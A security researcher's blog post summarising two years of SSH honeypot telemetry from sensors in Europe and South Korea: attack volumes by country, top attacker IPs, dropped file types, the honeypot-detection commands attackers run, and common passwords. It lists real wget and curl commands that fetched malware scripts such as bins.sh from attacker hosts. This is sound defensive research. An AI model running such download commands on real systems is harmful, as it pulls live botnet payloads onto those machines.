Adam Orton
7 min readApr 2, 2018

Working in the security industry in the wake of APT1 and the subsequent slew of attack groups making headlines over the last few years, one began to wonder if countries like China and Russia really were trying to hack absolutely everyone, and an idea was born:

Setup a host of interactive honeypots on different continents, log all the things, wait a few years and let the data speak for itself.

Starting late 2015, the original plan was to setup sensors around the world, including China, Russia, America and Europe, but alas, getting public IP space inside China without an ICP license is somewhat tricky.

In the end, the project had two sensors generating sizeable datasets; one in Europe (OVH Roubaix) and one in South Korea (StarryDNS Seoul). Both have been operational since late 2015 and are running the excellent Cowrie SSH honeypot application written by Michel Oosterhof.

The setup is pretty straightforward. Both sensors listen on TCP/22, log to JSON and use Logstash Lumberjack to forward directly into a central Elasticsearch cluster. Maintaining and watering Elastic between major releases over two years was testing at times,but since upgrading to Elastic 6. 2, things are way more stable and the latest Kibana has some awesome visualisation tools courtesy of the Vega framework, including Sankey graphs:

First, some high levels stats on the overall data set:

  • 16,883,139 unique events collected
  • 8,708,143 from European sensor
  • 8,175,000 from South Korean sensor
  • 3,269,806 failed logins
  • 116,125 successful logins
  • 114,087 commands entered
  • 8222 files downloaded
  • 1571 files uploaded

All events were geo-IP tagged to allow for tracking of attacker trends and the below tables show the top 10 source countries that hit each sensor:

Europe

South Korea

The most alarming observation from the raw data is the extremely high number of events originating from China against the sensor in South Korea, compared with the European sensor, with almost ten times as many events observed.

The high number of events from the Netherlands and Russia against the European sensor were primarily generated by direct TCP forwarding events, with a prolonged period of usage as a open proxy, which was later disabled in the Cowrie configuration to suppress noise and stop the sensor IP being reported.

Worst Offenders

The top ten source IP addresses per sensor are given below:

South Korea

221.229.172.97 - Chinanet - Nanjing
116.31.116.25 - Chinanet - Shenzhen
116.31.116.24 - Chinanet - Shenzhen
116.31.116.23 - Chinanet - Shenzhen
69.60.116.97 - Infolink Global - Miami
91.195.103.182 - CJSC Metrostandart - Prague
221.229.172.102 - Chinanet - Nanjing
58.218.198.156 - Chinanet - Nanjing
58.218.198.172 - Chinanet - Nanjing
195.66.188.50 - Crnogorski Telekom a.d.Podgorica - Montenegro

As noted from the total event counts, the majority of IP addresses hitting this box were located in mainland China, with a noticeable effort by the group loosely know as “ChinaZ”. This sensor also ran the Dionaea honeypot application alongside Cowrie for a while and similar IP ranges were seen hitting it on SMB, FTP, HTTP and other common ports, with the various exploits of the time (Shellshock, heartbleed, etc).

Europe

5.45.84.74 -  Serverius Holding - Netherlands 
197.96.172.66 - IS - Johannesburg
5.45.84.76 - Serverius Holding - Netherlands
91.230.47.81 - Regionalnaya Kompaniya Svyazi Ltd. - Dublin
91.230.47.82 - Regionalnaya Kompaniya Svyazi Ltd. - Dublin
91.195.103.182 - CJSC Metrostandart - Prague
91.195.103.188 - CJSC Metrostandart - Prague
91.195.103.183 - CJSC Metrostandart - Prague
194.88.106.181 - WorldStream - Netherlands
91.195.103.185 - CJSC Metrostandart - Prague

The European results were heavily skewed by persistent abuse of the Cowrie TCP forwarding function by the 91.195.X.X range which, based on some metadata leakage showing large amounts of traffic to Yandex and Mailru, was likely originating from the Russian Federation.

Downloaded Files

Tracking downloads of files to the honeypots via Curl, Wget and similar, the below were the most frequently downloaded files:

wget http://185.165.29.125/bins.sh 
curl -O http://198.167.140.29/gtop.sh
wget http://198.167.140.29/gtop.sh
wget http://77.247.178.189/bins.sh
wget http://208.67.1.42/bins.sh
wget http://185.148.39.193/bins.sh
wget http://107.174.34.70/Swag.sh
wget http://198.167.140.29/bins.sh
curl -O http://catsmeowalot.com/lmao.sh
wget http://catsmeowalot.com/lmao.sh
curl -O http://109.236.88.125/bins.sh

HFS, an interlude

Over the duration of this experiment (and with my day job as a security researcher/threat hunter), I often carried out mock investigations on things hitting the sensors and had great success finding additional payloads, especially when the actors involved were originating from South-East Asia.

HFS is a HTTP file server that seems to be extremely popular with Chinese threat actors and often by simply dropping the file name from the URI and visiting the sub-directory serving it, one can usually find additional malware and scripts.

HFS also has a handy archive feature that will Tar archive all the files on the web server if configured (most are). I wrote a small script to go and pull these archives via a SOCKS proxy. The original aim was to extend Cowrie to effectively check for HFS downloads and do this automatically, but this is still on the rainy-day list.

Dropped File Types

In the early days, a lot of stuff that was dropped was mainly Romanian IP ranges trying to install Counter Strike:GO servers or super-retro Perl IRC bots. In fact, the CS:GO has abated, but there are still a bunch of folks dropping Perl IRC bots with reasonable frequency. As with HFS, you can have a lot of fun with IRC bots and judging by bot numbers in some of the channels, they are doing pretty well. That is left as an exercise for the reader though!

Based on the Linux file command output, the following unique file types were observed across the sensors during their operation:

ASCII text
PE32 executable (GUI) Intel 80386
very short file (no magic)
assembler source
Bourne-Again shell script
broken XHTML document text (version 1.0)
C source
C++ source
Composite Document File V2 Document
data
ELF 32-bit LSB executable
ELF 32-bit LSB relocatable
ELF 32-bit MSB executable
ELF 64-bit LSB executable
ELF 64-bit LSB shared object
FORTRAN program
gzip compressed data
HTML document
ISO-8859 text
makefile script
Perl script
PHP script
POSIX shell script
POSIX tar archive
python 2.4 byte-compiled
python 2.6 byte-compiled
python 2.7 byte-compiled
Python script
tar archive
troff or preprocessor input
UTF-8 Unicode text
Zip archive data

By far, the most popular file type was the ELF 32-bit LSB executable, with the most popular malware family being the “BillGates” DDoS framework as described here.

A full list of SHA-256 hashes observed from both sensors can be downloaded here and here.

Bots vs. PEBCAC

Another fun pastime was reviewing the TTY logs of the longer sessions to try and find hands-on-keyboard activity amongst the plethora of bots that permanently scan and exploit the whole internet.

For those familiar with running SSH honeypots, it’s usually pretty obvious to spot real people over bots, as the first set of commands humans will likely run are checks to try and weed out if they are in a honeypot or not. In fact, Shodan even has a handy “Honeypot or Not?” service to assist with this.

Most smart attackers will at least check:

  • /proc/cpuinfo
  • free -m
  • ifconfig
  • whoami
  • hostname
  • df -kh

The reason for this is that Cowrie and Kippo ship with a bunch of default responses to the above and its not too hard to spot these once you know what to look for. If the ifconfig result doesn’t return the IP you just exploited, something is obviously up, right? Smart honeypot owners tweak the above (and more!) to make the environment both convincing, but safe.

With a bit of fine tuning, its pretty easy to fool attackers, after which they then proceed to do all sorts of weird and wonderful stuff. Repeated spelling fails followed by terminal ranting is a personal favourite to watch.

Popular Users/Passwords

For me, these stats are less useful (anyone using these passwords for real is asking for a breach), but the password attempts logged were generally the same between the two sensors with no regionally specific bias.

The top twenty passwords seen over the last two year period were:

123456
password
admin
1234
root
12345
ubnt
111111
123
support
test
admin123
default
0
user
0
admin1234
admin1
system
1

The top ten usernames used in authentication attempts were:

root 
admin
test
user
oracle
support
ubnt
guest
git
nagios

In conclusion and looking forward

Running SSH honeypots is cheap, fun to do, easy to setup and can generate some genuinely insightful telemetry. Feeding and watering multiple sensors over a longer time period can be challenging as a hobbyist, but is worth the intelligence gain.

In terms of what was achieved and the success of the original idea, I think it is clear that targeting IS significantly different depending on the geo-location of the sensors used and something that needs more in-depth data analysis to explore further, before drawing any solid conclusions.

SSH honeypots are good, but for me, too susceptible to auto-bots and amateur hackers to keep them interesting in future. I have some plans for running a stable of high-interaction RDP honey servers, complete with honey documents, session recording to video and a bunch of other cool things that I suspect might generate more targeted and revealing attacker TTP’s, but that’s one for another day.

I can haz data?

I have around 10GB of raw session data and downloaded files from the two sensors discussed here. If anybody has an interest in it beyond the hash lists and the stats here, you can get in touch via Twitter.

Adam Orton

Security researcher and APT hunter by day, amateur malware researcher and bad coder by night. All opinions are my own and not the views of my employer.